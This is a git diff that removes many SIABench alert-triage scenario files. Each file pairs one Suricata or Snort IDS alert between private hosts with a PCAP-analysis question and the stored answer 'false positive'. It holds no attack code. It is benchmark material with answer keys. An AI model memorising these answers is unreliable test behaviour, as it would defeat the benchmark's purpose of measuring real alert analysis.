a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236133.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236133.json deleted file mode 100644 index a8e34ef4bfdc9883014918b5091d71ddbe6be4c2..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236133.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236133", - "alert_type": "False", - "alert_name": "dp_236133" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:55:25.137784+0000 \"SURICATA STREAM excessive retransmissions\" {TCP} 192.168.1.90:37996 -> 192.168.1.70:8080", - "alert": "1970-01-01T05:55:25.137784+0000 \"SURICATA STREAM excessive retransmissions\" {TCP} 192.168.1.90:37996 -> 192.168.1.70:8080", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236134.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236134.json deleted file mode 100644 index a1e9da9f8dae5664cc9315a3c48c0a7b1ed770b5..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236134.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236134", - "alert_type": "False", - "alert_name": "dp_236134" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T00:45:24.857770+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T00:45:24.857770+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236135.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236135.json deleted file mode 100644 index ad3aefd2fc9d44774a9970b44cfcebc8fa354b50..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236135.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236135", - "alert_type": "False", - "alert_name": "dp_236135" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T00:45:24.870396+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T00:45:24.870396+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236136.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236136.json deleted file mode 100644 index f822c0556465aea2a7a030a9c153120fc1127508..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236136.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236136", - "alert_type": "False", - "alert_name": "dp_236136" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T00:45:28.194618+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T00:45:28.194618+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236137.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236137.json deleted file mode 100644 index e3d76ba0530422fe72fc74318bf0b85984ba77d4..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236137.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236137", - "alert_type": "False", - "alert_name": "dp_236137" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T00:45:28.197874+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T00:45:28.197874+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236138.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236138.json deleted file mode 100644 index 1c3f60fa80e570992758f5726ef01880968987b2..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236138.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236138", - "alert_type": "False", - "alert_name": "dp_236138" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:55:41.019442+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:55:41.019442+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236139.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236139.json deleted file mode 100644 index 4ab49bb3f64616b6b26522f30e39e4fc6ee538aa..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236139.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236139", - "alert_type": "False", - "alert_name": "dp_236139" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:55:41.023466+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:55:41.023466+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236140.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236140.json deleted file mode 100644 index 6f898cb1b4be4e4c595b4dd389c5455495c7e61a..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236140.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236140", - "alert_type": "False", - "alert_name": "dp_236140" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:55:44.400161+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:55:44.400161+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236141.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236141.json deleted file mode 100644 index f295f3bddd6aae4752aeb47d08ff3d4140d1cc3b..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236141.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236141", - "alert_type": "False", - "alert_name": "dp_236141" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:55:44.401834+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:55:44.401834+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236142.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236142.json deleted file mode 100644 index 5dba4268aaa446fa0c67a783b4307dc0ec41ecf9..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236142.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236142", - "alert_type": "False", - "alert_name": "dp_236142" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:56:22.108843+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:56:22.108843+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236143.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236143.json deleted file mode 100644 index 386d928dff96002c24166396d306b0aabc7cb585..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236143.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236143", - "alert_type": "False", - "alert_name": "dp_236143" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:56:42.459068+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:56:42.459068+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236144.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236144.json deleted file mode 100644 index f335e94ab3e973e354995d3aa743065420bbb658..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236144.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236144", - "alert_type": "False", - "alert_name": "dp_236144" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:56:42.468203+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:56:42.468203+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236145.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236145.json deleted file mode 100644 index f96df0f05e1749dc7ff6b1bfe1b795ea62ae1411..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236145.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236145", - "alert_type": "False", - "alert_name": "dp_236145" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:56:45.838628+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:56:45.838628+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236146.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236146.json deleted file mode 100644 index 9a28eafb2354351a00c50b54a4730bd71d7275c5..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236146.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236146", - "alert_type": "False", - "alert_name": "dp_236146" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:56:45.847162+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:56:45.847162+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236147.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236147.json deleted file mode 100644 index 10e3e23cdd8eeaa597f9f19384e3ec93c91b9225..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236147.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236147", - "alert_type": "False", - "alert_name": "dp_236147" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:57:23.548893+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:57:23.548893+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236148.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236148.json deleted file mode 100644 index f6b93dd3f0b16ca379c36cf3106e38fa3f0e00ba..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236148.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236148", - "alert_type": "False", - "alert_name": "dp_236148" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:57:43.898562+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:57:43.898562+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236149.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236149.json deleted file mode 100644 index 31a4aaa3bd2a2862825e5a6cee6057370aa25a32..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236149.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236149", - "alert_type": "False", - "alert_name": "dp_236149" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:57:43.905585+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:57:43.905585+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236182.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236182.json deleted file mode 100644 index 2ddd98810d1072493740a16a02643599dd8fb5d8..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236182.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236182", - "alert_type": "False", - "alert_name": "dp_236182" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T00:46:32.572458+0000 \"SURICATA STREAM excessive retransmissions\" {TCP} 192.168.1.90:34398 -> 192.168.1.70:8080", - "alert": "1970-01-01T00:46:32.572458+0000 \"SURICATA STREAM excessive retransmissions\" {TCP} 192.168.1.90:34398 -> 192.168.1.70:8080", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236234.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236234.json deleted file mode 100644 index 4e73c3522d9cb2a561650abe0d9c6bd5e5efce3f..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236234.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236234", - "alert_type": "False", - "alert_name": "dp_236234" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/01-23:45:07.107938 \"INDICATOR-SHELLCODE x86 setgid 0\" {TCP} 192.168.1.70:8080 -> 192.168.1.90:51716", - "alert": "01/01-23:45:07.107938 \"INDICATOR-SHELLCODE x86 setgid 0\" {TCP} 192.168.1.70:8080 -> 192.168.1.90:51716", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236256.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236256.json deleted file mode 100644 index 8a106ca35748bf511ccb75bf84c02ecc4eb5ceac..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236256.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236256", - "alert_type": "False", - "alert_name": "dp_236256" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/01-23:49:00.420684 \"INDICATOR-SHELLCODE x86 NOOP\" {TCP} 192.168.1.70:8080 -> 192.168.1.90:57910", - "alert": "01/01-23:49:00.420684 \"INDICATOR-SHELLCODE x86 NOOP\" {TCP} 192.168.1.70:8080 -> 192.168.1.90:57910", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236269.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236269.json deleted file mode 100644 index e9c02a3baf3951c25cae662dc3b1599bd05c3748..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236269.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236269", - "alert_type": "False", - "alert_name": "dp_236269" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T23:50:53.423656+0000 \"SURICATA STREAM excessive retransmissions\" {TCP} 192.168.1.70:8080 -> 192.168.1.90:40694", - "alert": "1970-01-01T23:50:53.423656+0000 \"SURICATA STREAM excessive retransmissions\" {TCP} 192.168.1.70:8080 -> 192.168.1.90:40694", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git 